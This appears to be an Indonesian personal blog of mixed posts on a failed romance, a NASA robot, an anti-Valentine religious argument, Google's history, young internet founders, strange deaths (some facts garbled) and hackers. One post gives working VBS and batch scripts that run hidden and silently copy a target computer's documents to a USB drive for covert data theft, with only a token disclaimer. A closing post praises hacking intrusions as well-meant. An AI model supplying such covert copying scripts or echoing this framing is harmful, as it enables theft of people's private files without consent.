TEMAN CURHAT

curhat

Beberapa hari ini, perasaan aku tidak menentu, coba saja bayangkan, tanpa sengaja kamu menemukan kembali seorang teman lama mu melalui jaringan internet via situs  friendster, awalnya aku ragu, apakah di adalah teman mu yang dulu, atau aku hanya salah saja, tapi nyatanya aku benar, ketika aku menulis pesan yang juga melalui friendster, karuan saja aku gembira dan senang ketika dia membalas pesan yang aku kirim, pertemanan yang dulu sempat hilang sekarang kemabali menghangat kemabali, apa lagi kami sering chat melalui YM, pertemanan yang awalnya hanya sebatas teman biasa namun berubah menjadi cinta, wah aku juga tidak tau kenapa aku menyukainya, perlu diingat lho, teman ku  ini cewek,he…….heeeeee, perasaan dulu aku tidak berminat dengan dia, sebab saat masih SD dulu dia hanyalah seorang gadis kecil, yang berkuli hitam manis, namun sekarang dia berubah 180% menjadi seorang gadis yang aduhai, wah

gila saat aku mengajaknya ngedete bareng dia tidak seperti gadis kecil yang aku kenal dulu, dia indah sekali, mungkin berlebih aku menggambarkannya, namun iulah kenyataannya, dari awal perjumpaan itulah rasa cinta ku muncul, ku beranikan diri untuk menggungkapkan isi hatiku, namun aku masih ragu, hingga suatu hari kesempatan itu datang juga, aku beranikan diri, untuk menyatakan cintaku kedia, namun apa lancur?? ternyata tidak dia menjawab bahwa dia telah  ada yang memiliki, dan aku hanyalah teman curhatnya saja, tidak lebih, itulah ucapan yang keluar dari bibir manisnya, pikir aja dech gimana perasaan ku saat itu( hancur berkeping-keping),

pasca kejadian itu aku selalu menghidar, namun dia paham dengan situasiku, meski dia sering telfon dan sms, mungkin ini akhir dari pertemana, sebenarnya aku tidak mengakhirnya, namun semuannya hilang, aku tau cinta tidak harus memiliki, begitu juga aku, yang tidak seharusnya memiliki dia, walau aku mencintaiinya.

semua hilang seketika saat dia berkata dia telah ada yang punya, dan aku hanyalah teman curhatnya,dia hanyalah kenaganku, dia hanya teman curhatku.

NASA KEMBALI BERAKSI

robot

Jika membahas mengenai antariksa luar, pasti tidak ada habisnya, sejuta misteri masih menyelimuti tata surya ruang angkasa, tulisan ini mengingatkan aku menegnai film armagedoon yang berhasil pergi keluar angkasa, namun bedanya, dalam film tesebut memilki misi yang mulia, yaitu penyelamatan bumi dari kehancuran meteor yang akan mengguncang planet bumi, sedangkan tulisan ini mengisahkan misi penelitin NASA( badan antariksan AS),yang baru-baru ini mengadakan penelitian keangksa luar dengan robot barunya, dan kecanggihan alatnya, yang bernilai ratusan juta dollar berikut artikel lengkapnya, yang aku saring dari yahoo.com nasa

NASA kembali sibuk mengembangkan robot angkasa untuk menjelajah dan meneliti planet-planet di masa depan. Kali ini, lembaga antariksa Amerika itu mengembangkan robot baru bernama Axel. Meski desainnya cukup simpel, Axel punya berbagai kapabilitas yang tidak dijumpai pada robot-robot sebelumnya. Menurut Issa A. D. Nesnas dari Jet Propulsion Laboratory NASA, Axel didesain untuk mengeksplorasi bagian-bagian planet yang belum terjamah. Robot ini dirancang dapat menjangkau bagian tersulit dari planet seperti jurang yang dalam. “Karena Axel juga relatif ringan, hanya dalam sekali misi bisa dibawa beberapa unit. Eksplorasi pun bisa lebih agresif,” papar Nesnas seperti dilansir TGDaily dan dikutip detikINET, Selasa (10/2/2009). Axel bisa memakai tipe roda yang berbeda untuk menyambangi berbagai jenis tempat yang curam sekalipun. Di bagian tengahnya ada semacam pengungkit untuk mengambil material yang diperlukan dalam penelitian. Berbagai fitur canggih pastinya ditautkan pada Axel, seperti kamera yang bisa berputar 360 derajat, kapabilitas komunikasi nirkabel dan sistem sensor untuk beroperasi secara mandiri.

SAY NO TO VALENTINE DAY’S ( HARUS & WAJIB ! )

stop-valentine-day
Bulan Februari sepertinya menjadi istimewa bagi sebagian orang. Kalau ada yang nanya, apa istimewanya, jawabannya pasti karena angka 14. Ya, tanggal 14 disebut-sebut sebagai hari Valentine. Sebenarnya apa sih Valentine? Kenapa hampir semua orang sibuk “berkasih sayang” pada hari itu? Kenapa juga ada cokelat, surat cinta, dan ucapan “Be My Valentine?” dari seseorang kepada orang lain yang mungkin dianggap spesial? Apakah memang hal tersebut ada dasarnya? Atau cuma ikut-ikutan dan ngga tau makna sebenarnya? Kalau kamu penasaran, coba simak baik-baik uraian berikut., tapi perlu diingat ya, warto kaka(baca: penulis blog ini) sanga anti banget ama yang namanya valetine day’s, jadi ntar kalau pembaca  memberi ucapan kepada saya, mohon maaf saja, jika tidak dibalas, sebab dalam kamus hidup saya tidak ada kata valentine day’s. he….heee….( narsis banget)
Sejarah Valentine
Ensiklopedia Katolik menyebutkan tiga versi tentang Valentine, tetapi versi terkenal adalah kisah Pendeta St.Valentine yang hidup di akhir abad ke 3 M di zaman Raja Romawi Claudius II. Pada tanggal 14 Februari 270 M Claudius II menghukum mati St.Valentine yang telah menentang beberapa perintahnya.
Claudius II melihat St.Valentine mengajak manusia kepada agama Nashrani lalu dia memerintahkan untuk menangkapnya.
Dalam versi kedua, Claudius II memandang para bujangan lebih tabah dalam berperang daripada mereka yang telah menikah yang sejak semula menolak untuk pergi berperang. Maka dia mengeluarkan perintah yang melarang pernikahan. Tetapi St.Valentine menentang perintah ini dan terus mengadakan pernikahan di gereja dengan sembunyi-sembunyi sampai akhirnya diketahui lalu dipenjarakan. Dalam penjara dia berkenalan dengan putri seorang penjaga penjara yang terserang penyakit. Ia mengobatinya hingga sembuh dan jatuh cinta kepadanya. Sebelum dihukum mati, dia mengirim sebuah kartu yang bertuliskan “Dari yang tulus cintanya, Valentine.” Hal itu terjadi setelah anak tersebut memeluk agama Nashrani bersama 46 kerabatnya.
Versi ketiga menyebutkan ketika agama Nashrani tersebar di Eropa, di salah satu desa terdapat sebuah tradisi Romawi yang menarik perhatian para pendeta. Dalam tradisi itu para pemuda desa selalu berkumpul setiap pertengahan bulan Februari. Mereka menulis nama-nama gadis desa dan meletakkannya di dalam sebuah kotak, lalu setiap pemuda mengambil salah satu nama dari kotak tersebut, dan gadis yang namanya keluar akan menjadi kekasihnya sepanjang tahun. Ia juga mengirimkan sebuah kartu yang bertuliskan ” dengan nama tuhan Ibu, saya kirimkan kepadamu kartu ini.” Akibat sulitnya menghilangkan tradisi Romawi ini, para pendeta memutuskan mengganti kalimat “dengan nama tuhan Ibu” dengan kalimat ” dengan nama Pendeta Valentine” sehingga dapat mengikat para pemuda tersebut dengan agama Nashrani.
Versi lain mengatakan St.Valentine ditanya tentang Atharid, tuhan perdagangan, kefasihan, makar dan pencurian, dan Jupiter, tuhan orang Romawi yang terbesar. Maka dia menjawab tuhan-tuhan tersebut buatan manusia dan bahwasanya tuhan yang sesungguhnya adalah Isa Al Masih, oleh karenanya ia dihukum mati. Maha Tinggi Allah dari apa yang dikatakan oleh orang-orang yang dzalim tersebut.
Kebiasaan mengirim kartu Valentine itu sendiri sebenarnya tidak ada kaitan langsung dengan St. Valentine. Pada 1415 M ketika the Duke of Orleans dipenjara di Tower of London pada perayaan hari gereja mengenang St.Valentine 14 Februari, ia mengirim puisi kepada istrinya di Perancis. Kemudian Geoffrey Chaucer, penyair Inggris mengkaitkannya dengan musim kawin burung dalam puisinya (lihat: The Encyclopedia Britannica, Vol.12 hal.242 , The World Book Encyclopedia, 1998).
Lalu bagaimana dengan ucapan “Be My Valentine?” Ken Sweiger dalam artikel “Should Biblical Christians Observe It?” (www.korrnet.org) mengatakan kata “Valentine” berasal dari Latin yang berarti : “Yang Maha Perkasa, Yang Maha Kuat dan Yang Maha Kuasa”. Kata ini ditujukan kepada Nimrod dan Lupercus, tuhan orang Romawi. Maka disadari atau tidak, -tulis Ken Sweiger- jika kita meminta orang menjadi “to be my Valentine”, hal itu berarti melakukan perbuatan yang dimurkai Tuhan (karena memintanya menjadi “Sang Maha Kuasa”) dan menghidupkan budaya pemujaan kepada berhala. Dalam Islam hal ini disebut Syirik, yang artinya menyekutukan Allah Subhanahu wa Ta’ala. Bahkan saat ini beredar kartu-kartu perayaan keagamaan ini dengan gambar anak kecil yang disebut cupid (berarti: the desire), yaitu si bayi bersayap putra Nimrod “the hunter” dewa Matahari dengan dua sayap terbang sambil mengarahkan anak panah ke gambar hati yang sebenarnya itu merupakan lambang tuhan cinta bagi orang-orang Romawi. Disebut tuhan Cinta, karena ia rupawan sehingga diburu wanita bahkan ia pun berzina dengan ibunya sendiri!!
Hukum Valentine
Tidak selayaknya bagi kita kaum muslimin meniru ritual agama lain yang tidak ada dasarnya dalam Islam. Allah telah menjelaskan dalam Al Qur’an, “Dan janganlah kamu mengikuti apa yang kamu tidak mengetahui tentangnya. Sesungguhnya pendengaran, penglihatan dan hati, semuanya akan diminta pertangggungjawabannya” (Al Isra’ : 36). Lalu dalam Al Maidah, “Hai orang-orang yang beriman, janganlah kamu mengambil orang-orang Yahudi dan Nasrani menjadi pemimpin-pemimpin(mu); sebahagian mereka adalah pemimpin bagi sebahagian yang lain. Barangsiapa di antara kamu mengambil mereka menjadi pemimpin, maka sesungguhnya orang itu termasuk golongan mereka. Sesungguhnya Allah tidak memberi petunjuk kepada orang-orang yang zalim.” (Al-Maidah:51)
Dalam sebuah hadits, Rasulullah SAW juga mengingatkan, “Barang siapa meniru suatu kaum, maka ia termasuk dari kaum tersebut.” (HR. At-Tirmidzi).valentine1
Kalau Allah dan RasulNya sudah berkata tidak untuk sesuatu, maka haram bagi kita untuk mengikuti sesuatu itu. Jangankan mengikuti, mendekatinya pun tidak boleh. Kalau memberi ucapan selamat? Itu sama aja tidak boleh. Ibnul Qayyim Al-Jauziyah rahimahullah berkata, “Memberi selamat atas acara ritual orang kafir yang khusus bagi mereka, telah disepakati bahwa perbuatan tersebut haram. Semisal memberi selamat atas hari raya dan puasa mereka, dengan mengucapkan, “Selamat hari raya!” dan sejenisnya. Bagi yang mengucapkannya, kalau pun tidak sampai pada kekafiran, paling tidak itu merupakan perbuatan haram. Karena berarti ia telah memberi selamat atas perbuatan mereka yang menyekutukan Allah. Bahkan perbuatan tersebut lebih besar dosanya di sisi Allah dan lebih dimurkai dari pada memberi selamat atas perbuatan minum khamar atau membunuh.”
Syeikh Ibnu Utsaimin rahimahullah menyatakan dalam fatwanya bahwa merayakan hari Valentine itu tidak boleh, karena: Pertama, ia merupakan hari raya bid’ah yang tidak ada dasar hukumnya di dalam syari’at Islam. Kedua, ia dapat menyebabkan hati sibuk dengan perkara-perkara rendahan seperti ini yang sangat bertentangan dengan petunjuk para salaf shalih (pendahulu kita) – semoga Allah meridhai mereka. Maka tidak halal melakukan ritual hari raya, baik dalam bentuk makan-makan, minum-minum, berpakaian, saling tukar hadiah ataupun lainnya. Hendaknya setiap muslim merasa bangga dengan agamanya, tidak menjadi orang yang tidak mempunyai pegangan dan ikut-ikutan. Semoga Allah melindungi kaum muslimin dari segala fitnah (ujian hidup), yang tampak ataupun yang tersembunyi dan semoga meliputi kita semua dengan bimbingan-Nya.
Nah dah taukan, apa itu valentine day’s, so jika sudah tau maka selayaknya kita sebagai muslim harus meninggalkan valentine day’s, bukankah didalam islam hari kasih sayang itu adanya setiap hari, bukan hanya tanggal 14 februari saja?? Meskipun aku bukan muslim yang taat tapi aku selalu berusaha untuk menjauhi larangannya.
Sumber: Bahaya Valentine http://van.9f.com/valentine.htm
Ada Apa dengan Valentine’s Day? http://swaramuslim.net

GOOGLE, UNIK NAMANYA UNIk SEJARAHNYA

logoSiapa yang tak kenal dengan Google. Bagi semua peselancar dunia cyber pasti sudah sangat akrab dengan Om Google ini. Google sangat terkenal dengan mesin pencari di rimba belantara dunia maya. Yang perlu dilakukan hanyalah mengetik kata sandi yang diinginkan maka Om Google akan melacak dan mencari informasi apapun yang diinginkan. Hingga detik ini tidak ada yang bisa menyangi google dalm hal search engine ,tidak juga yahoo, yang usianya lebih tua, dan merupakan saingan terdekat dari dari google, Namun sebagian orang hanya bisa menggunakan dan bisa menyebutnya saja, dan tidak tau asal usul google, ok, mari kita simak sejarah berdirinya sang penggempar dunia internet saat pertama kali ditemukan.
Google dengan dua “o” pun unik, sebab jika data hasil pencarian ditemukan, jumlah “o” akan muncul sebanyak Web yang didapat oleh mesin pencari.
Kata Google berasal dari kata Googlo. Kata itu diciptakan oleh Milton Sirotta, Ponakan Edward Kasner seorang ahli Matematika dari AS. Sirotta membuat istilah Googlo untuk menyebutkan angka 1 (satu) yang diikuti 100 angka 0 (nol), Oleh karena itu penggunaan kata Google merupakan Refleksi dari kata Googlo.
Tapi tahukan Anda, Google tak hanya unik dari asal katanya. Google pun memiliki latar belakang sejarah yang unik. Google lahir dari sebuah pertemuan dua pemuda yang terjadi secara tidak sengaja pada tahun 1995 lalu. Larry Page, alumnus Universitas Michigan (24), yang sedang menikmati kunjungan akhir pekan, tanpa sengaja dipertemukan dengan Sergey Brin, salah seorang murid (23) yang mendapat tugas mengantar keliling Lary.
Dalam pertemuan tanpa sengaja tadi, dua pendiri Google tersebut sering terlibat diskusi panjang. Keduanya memiliki pendapat dan pandangan yang berbeda sehingga sering terlibat perdebatan. Namun, perbedaan pemikiran mereka justru menghasilkan sebuah pendekatan unik dalam menyelesaikan salah satu tantangan terbesar pada dunia komputer. Yakni, masalah bagaimana memperoleh kembali data dari set data masif.
Pada Januari 1996, Larry dan Sergey mulai melakukan kolaborasi dalam pembuatan search engine yang diberi nama BackRub. Setahun kemudian pendekatan unik mereka tentang analisis jaringan mengangkat reputasi BackRub. Kabar mengenai teknik baru mesin pencari langsung menyebar ke penjuru kampus.
Larry dan Sergey terus menyempurnakan teknologi Google sepanjang awal 1998. Keduanya juga mulai mencari investor untuk mengembangkan kecanggihan teknologi Google.
Gayung pun bersambut. Mereka mendapat suntikan dana dari teman kampus, Andy Bechtolsheim, yang merupakan pendiri Sun Microsystems. Pertemuana mereka terjadi pada pagi buta di serambi asrama mahasiswa fakultas Stanford, di Palo Alto. Larry dan Sergey memberikan demo secara singkat karena Andy tak memiliki waktu yang cukup lama.
Melalui demo itu Andy setuju untuk memberikan bantuan dana berupa sebuah cek senilai 100 ribu dolar AS. Sayangnya, cek itu tertulis atas nama perusahaan Google. Padahal saat itu perusahaan bernama Google belum didirikan oleh Sergey dan Larry.
Investasi dari Andy menjadi sebuah dilema. Larry dan Sergey tak mungkin menyairkan cek selama belum ada lembaga legal yang bernama perusahaan Google. Karena itu, dua pendiri Google ini kembali bekerja keras dalam mencari investasi. Mereka mencari pendana dari kalangan keluarga, teman, dan sejawat hingga akhirnya terkumpul dana sekitar 1 juta dolar. Dan akhirnya, perusahaan Google pun dapat didirikan pada 7 Septembar 1998 dan dibuka secara resmi di Menlo Park, California.
Misi Google adalah, “untuk mengumpulkan informasi dunia dan menjadikannya dapat diakses secara universal dan berguna.” Filosofi Google meliputi slogan seperti “Don`t be evil”, dan “Kerja harusnya menatang dan tantangan itu harusnya menyenangkan”, menggambarkan budaya perusahaan yang santai.
Saat ini Google merupakan sebuah perusahaan berpredikat nomor satu dalam top 100 perusahaan yang paling diminati di Amerika, dengan jumlah pegawai sekitar 10 ribu orang.

SANG PENGUBAH DUNIA VIA DUNIA MAYA

inilah pemuda harapan negara, meski tak sekuat hercules, tak setangguh super hero (batma, supeman, spiderman, dan man-man lainnya, he…he..), dan juga tak sepintar albert eistein, tapi mereka mampu menciptakan sesutu yang sangat berguna bagi peradaban umat manusia, berikut penemuan penemuan mereka yang aku anggap sangat berguna bagi umat manusia, terutama mengenai teknologi internet.

google

1. Larry Page dan Sergey Brin Menemukan Google pada tahun 1998 ketika mereka baru berusia 24 tahun. Mulai di dalam garasi yang menjadi “kantor” pertama mereka, dua orang ini mengilhami ribuan anak muda untuk mencari uang online. Larry dan Sergey kemudian menciptakan perusahaan senilai satu multi milyar dollar yang mengguncangkan Internet.

face-book

2. Mark Zuckerberg Mark Zuckerberg, mahasiswa universitas Harvard yang menemukan Facebook sebagai satu platform jaringan sosial bagi remaja di perguruan tinggi ketika dia baru berusia 19 tahun. Facebook kini merupakan situs web jaringan sosial terbesar kedua setelah MySpace. Facebook terus tumbuh hari demi hari, dengan jutaan pengguna baru yang terus mendaftar setiap bulan!

you-tube

3. steven chen dan chad hurley Para pencipta dari situs web “berbagi video online”, YouTube. Mereka mendirikan YouTube pada 2005 ketika Chad berusia 28 tahun dan Steve 27 tahun. YouTube kemudian diakuisisi oleh Google dengan nilai $1.65 milyar.

yahoo

4.  jerry yang dan david filo Di tahun 1995 kedua orang ini menemukan Yahoo!, mesin pencari yang merupakan saingan terdekat Google. Jerry berusia 26 tahun dan David Filo 28 tahun ketika mereka menciptakan Yahoo! Kedua orang ini sekarang mungkin lagi hangat-hangatnya dibicarakan orang-orang, setelah Microsoft meluncurkan tawaran senilai US$44.6 milyar untuk mengambil alih Yahoo!

wp

5. Matt Mullenweg baru berusia 19 tahun ketika ia menciptakan platform blogging yang kini dipakai dimana-mana. Ia mendirikan platform blogging WordPress pada tahun 2005, dan sejak itu blogosphere pun mulai berevolusi. Orang-orang mulai berpindah dari MovableType dan platform lainnya ke WordPress, karena platform baru ini memang mudah dipakai dan selalu diperbaharui dan terus meningkat. tom andreson Menciptakan jaringan sosial #1 di dunia dengan lebih dari 100 juta pengguna.

tom

6. Tom Anderson mendirikan MySpace di tahun 2004 ketika ia baru berusia 23 tahun. Dia mungkin tidak sekaya Mark Zuckerberg, tapi ia tercatat sebagai pendiri dari jaringan sosial yang dipakai paling luas di Internet.

fire

7. Blake Ross mendirikan Mozilla ketika dia baru berusia 19 tahun. Sejak itu, Mozilla tumbuh sangat pesat, menggoda pengguna Internet untuk memakai penjelajah Firefox Mozilla mereka sendiri, yang terbukti memang lebih mudah dioperasikan dibandingkan kebanyakan aplikasi penjelajah web lainnya.

ebay

8. pierre omidyarPada tahun 1995 ketika ia baru berusia 28 tahun, Pierre Omidyar mendirikan eBay, lelangan online sedunia. Sejak itu, banyak orang-orang menghargai penemuannya, sehingga mendorong eBay menjadi platform dunia.

*dari berbagai sumber

7 KEMATIAN ANEH SEPANJANG SEJARAH

Mungkin kebanyakan orang menganggap kematian hal yang lumrah, sebab sesuatu yang bernyawa itu pasti menerima mati, tanpa kecuali, siapapun dia, meskipun orang tersebut, mencanangkan bahwa olahraga dapat memperpanjang umur, toh nyatanya dia mati terlebih dahulu dalam usia muda, sebab segalanya sudah ada yang mengatur, berikut bebeerapa kisah kematian yang aku anggap menarikkematian

1.1916: Grigori Rasputin, dukun sekaligus tokoh politik Rusia, diracun dengan dosis yang sangat tinggi ketika sedang menyantap makan malam bersama musuh politiknya. Namun dia tidak mati, dan dengan segera seorang pembunuh mengendap-endap di belakang dan menembak tepat di kepalanya. Ketika ingin mengecek apakah Rasputin sudah tewas, si pembunuh tiba2 merasa ada kekuatan mistik yang mencekeknya. Rasputin ternyata masih hidup dan berusaha lari dari kepungan musuhnya. Sayangnya, ia tertembak tiga kali dan jatuh. musuh2nya tersebut kemudian memukulinya dan melemparnya ke sungai yang sangaaat dingin (frozen river). Rasputin pun tewas. Namun dari hasil otopsi, diketahui Rasputin tewas bukan karena diracun, ditembak, dipukuli, atau mati beku, melainkan mati tenggelam karena pingsan dipukuli ketika dilempar ke sungai
2. 1981: Pada bulan Maret 1981, Carl McCunn membayar pilot sewaan untuk menerjunkannya di sebuah danau terpencil dekat Sungai Coleen, Alaska, untuk memotret kehidupan liar. Namun sayang, ia lupa meminta sang pilot untuk menjemputnya kembali di bulan Agustus. Karena tidak mau mati dalam keadaan lapar, ia memilih untuk menembak kepalanya. Jasadnya diketemukan pada bulan Februari 1982

3.1322: Humphrey de Bohun, 4th Earl of Hereford tertusuk dan tembus oleh tombak tepat di bagian anusnya dalam the Battle of Boroughbridge.
4. 358 SM: Dramawan (pembuat drama) Yunani Aeschylus terbunuh ketika seekor elang menjatuhkan kura-kura di atas kepalanya. Sang elang menyangka bahwa kepala botak Aeschylus adalah batu. Untungnya, si kura2 selamat
5. 2005: Seorang pemuda Korea Selatan, Lee Seung Seop (28 thn), pingsan kecapekan dan tewas setelah bermain Starcraft di warnet selama 50 jam tanpa berhenti.
6. 1984: Jim Fixx, orang yang menulis “The Complete Book of Running” dan menyerukan bahwa lari dan diet yang sehat dapat memperpanjang usia manusia, tewas akibat serangan jantung ketika ia sedang berlari. Dari hasil otopsi, ditemukan bahwa Fixx tewas setelah tiga arteri jantung Fixx tersumbat (akibat kecapekan lari?).
7. 1899: Presiden Perancis Félix Faure karena stroke ketika sedang di-oral sex di kantornya

ih, serem juga ya, semoga bisa menambah pengetahuan

Trik Copy Data Ke Flash Disk Secara Diam-diam

transcendjetflashv953

Well, mencopy tanpa ketahuan???, mungkin nggak sich?? mungkin aja, walupun kita buka seorang hacker, hemmm, lagi-lagi ngomongin  hacker, mank ni orang saat ini sedang teropsesi menjadi seorang hacker yang handal, he…hee…, ni Gwe kasih bocoran dikit aja, hujan kali bocoran.he…he…, nah ini dia caranya, semoga bermanfaat
1.Buka notepad, buat file vbs ketik atau copy paste script berikut:
dim wshshell, dos
set wshshell = wscript.createobject(”wscript.shell”)
dos = wshshell.expandenvironmentstrings(”%comspec%”)
wshshell.run (dos & ” /c tarik.bat”), vbhide
2.Simpan dengan file name nya contoh start.vbs save as typenya pilih all files
3.Buka notepad lagi, buat file bat ketik atau copy paste script berikut:
@echo off
mkdir %computername%
xcopy “C:\Documents and Settings\%username%\My Documents\*.jpg” %computername% /s/c/q/r
@cls
@exit
4.Simpan dengan file name nya contoh tarik.bat save as typenya pilih all files.
Nama file bat ini harus sesuai dengan script file vbs baris ke empat (tarik.bat)

Simpan kedua file tersebut didalam flash disk, Untuk copy file komputer target secara diam-diam jalankan (2x klik) file start.vbs.
Fungi file vbs (start.vbs) berfungsi untuk menjalankan file bat (tarik.bat) secara diam-diam atau istilahnya background proses. Sedangkan file bat (tarik.bat) berfungsi untuk menjalankan perintah copy semua file dengan ektensi tertentu yang ada dikomputer target.
Contoh tersebuat diatas adalah copy semua file yang berektensi jpg (file gambar) yang ada di folder MyDocuments di komputer target (lihat baris ketiga script file bat) Dan disimpan kedalam flash disk ke dalam folder dengan nama sesuai nama komputer target. anda bisa meng edit sendiri kedua file tsb diatas sesuai keperluan format file dan folder target yg akan di copy.
Jika anda malas untuk ketik script dalam notepad, kedua file bisa didownload Klik Disini
Artikel ini hanya pengetahuan saja, tidak ada maksud mengajarkan untuk mencuri data komputer orang.Contoh penggunaan yang baik adalah untuk backup file anda ke flash disk.

HACKER

hacker11Hari aku pengen banget nulis mengenai hacker, secara aku bercita-cita menjadi seorang hacker yang handal, he.he, Jika ngebahas mengenai hacker or cracker pasti tidak pernah habisnya, nah untuk mengenal lebih jauh siapa saja para hecker yang pernah ngebobol server jaringan sebuah organisasi or perusahaan yang berlisensi internasional,namun dari sekian banyak hacker yang udah malang melinang didunia hacker nama mereka tidak asing lagi, mungkin hanya mereka berlima inilah yang pass aku tulis di blog ku sebenarnya 5 orang tapi 1 orangnya belum termasuk hacker , yaitu aku sendiri,he,,,he… dan termasuk hacker dari golongan hitam, mari kita liatbersama-samat3ngkorak1
1.JONATHAN JAMES
sapa siy niy ni orang…?okay, James adalah orang amerika, saat baru umur 16 taun dia dikirm ke penjara karena kelakuannya didunia maya cuy..situs departemen pertahanan Amerika dibobol ama si James dan dia cuma bilang itu tantangan bagi dia n merupakan datu kesenangan tersendiri..wah gila juga ni orang;;
NASA juga kena keisengan dia, James nyuri software NASA ang diperkirakan seharga $1.7 juta dollar AS. sampe2 NASA dipaksa untuk mematikan server dan sistemnya!!!
karena kelakuannya juga doi gak boleh megang komputer selama 10 tahun..kasian nih orang..haha
tapi sekarang doi udah dijalan yang bener dan bikin sebuah perusahaan keamanan dibidang komputer..mantab!!

2. ADRIAN LAMO
ni orang juga sarap.doi ngebobol New York Times buat nedapetin info personal dan beberapa security number n ngebobol Microsoft (busyet gak tanggung2 dah). doi akhirnya didenda $65.000 dollar US,
saat ini doi jadi pembicara dibeberapa acara seminar!! bravo dach!!

3. KEVIN MITNICK
kalo menurut gw inilah legenda hidup yang saat ini bener2 mantap dalam dunia hack.!!
ni kelakuan doi:

* menggunakan Los Angeles bus transfer system buat ngedapetin tumpangan gatis

* Mengelabui FBI

* Hacking kedalam DEC system(Digital Equipment Corporation)

* ngedapetin administrator positon dalam satu komputer IBM biar menang judi, karena adminnya yang punya laptop IBM tersebut..haha

* Hacking Motorola, NEC, Nokia, Sun Microsystems dan Fujitsu Siemens systems

dan masih banyak lagi kelakuan doi yang luar binasa
seorang white hat hacker pun yang bernama Tsutomu Shimomura pun (ahli juga doi dan merupakan top 5 white hat hacker), di hack komputer systemnya, dan terjadilah perang luar biasa..
doi ketangkep dan kelacak oleh FBI dengan bantuan Tsutomu Shimomura yang ngelacak (tracking) lewat jaringan HP’ yang dibawa ama Mitnick saat itu..

tapi sekarang doi dah tobat n jadi seorang penulis buku, konsultan security, dan pembicara.

4. KEVIN POULSEN
juga dikenal dengan Dark Dante, doi ngehack database FBI (galak niy orang)
selain itu doi juga ngehack seluruh lines phone station. karena emang kemahiran dia ngehack lewat phone lines.
saat ini, dia jadi senior editor di Wired News, dan berhasil mengengkap 744 penawaran sex melalui profiles Myspace..!!
sukses dach gan!!
5. ROBERT TAPPAN MORIS
niy orang adalah orang yang pertama kali bikin Worm, yang dinamain Morris Worm (narsis niy orang)
melalui internet doi nyebari wormnya yang mengakibatkan sekitar 6000 komputer jadi down..!!
dia akhirnya dipenjarakan rumah selama 3 tahun dan didenda sebesar $10.500 dollars
sekarang doi kerja sebagai professor di sebuah MIT Computer Science and Artificial Intelligence Laboratory!!
So, jangan menganggap para hacker itu hanya bisa mencuri, sebenarnya mereka itu membagikan ilmu mereka yang tidak diajarkan disekolah-sekolah formal, mungkin awalnya mereka pempraktekkan ilmu yang mereka dapat, selanjutnya mereka berusahaan ngebobol system tertentu, tapi aku yakin mereka ngebobol system pasti ada maksud yang baik juga, contohnya  sebatas mana system keamanan sebuah server, apakah mudah dibobol, secanggih mana security server jaringan tersebut, so jika mudah dibobol maka sipemilik server akan segera memperbaiki server jaringan tersebut.
Ingat!!!(waduh dah kayak pak guru aja, he,,,he,,,) ilmu yang dimiliki seseorang tanpa diperaktekkan akan percuma karena tidak akan ada manfaatnya bagi semua orang, tapi ilmu yang bermanfaat lho, bukan ilmu korupsi yang sedang menjamur. He.he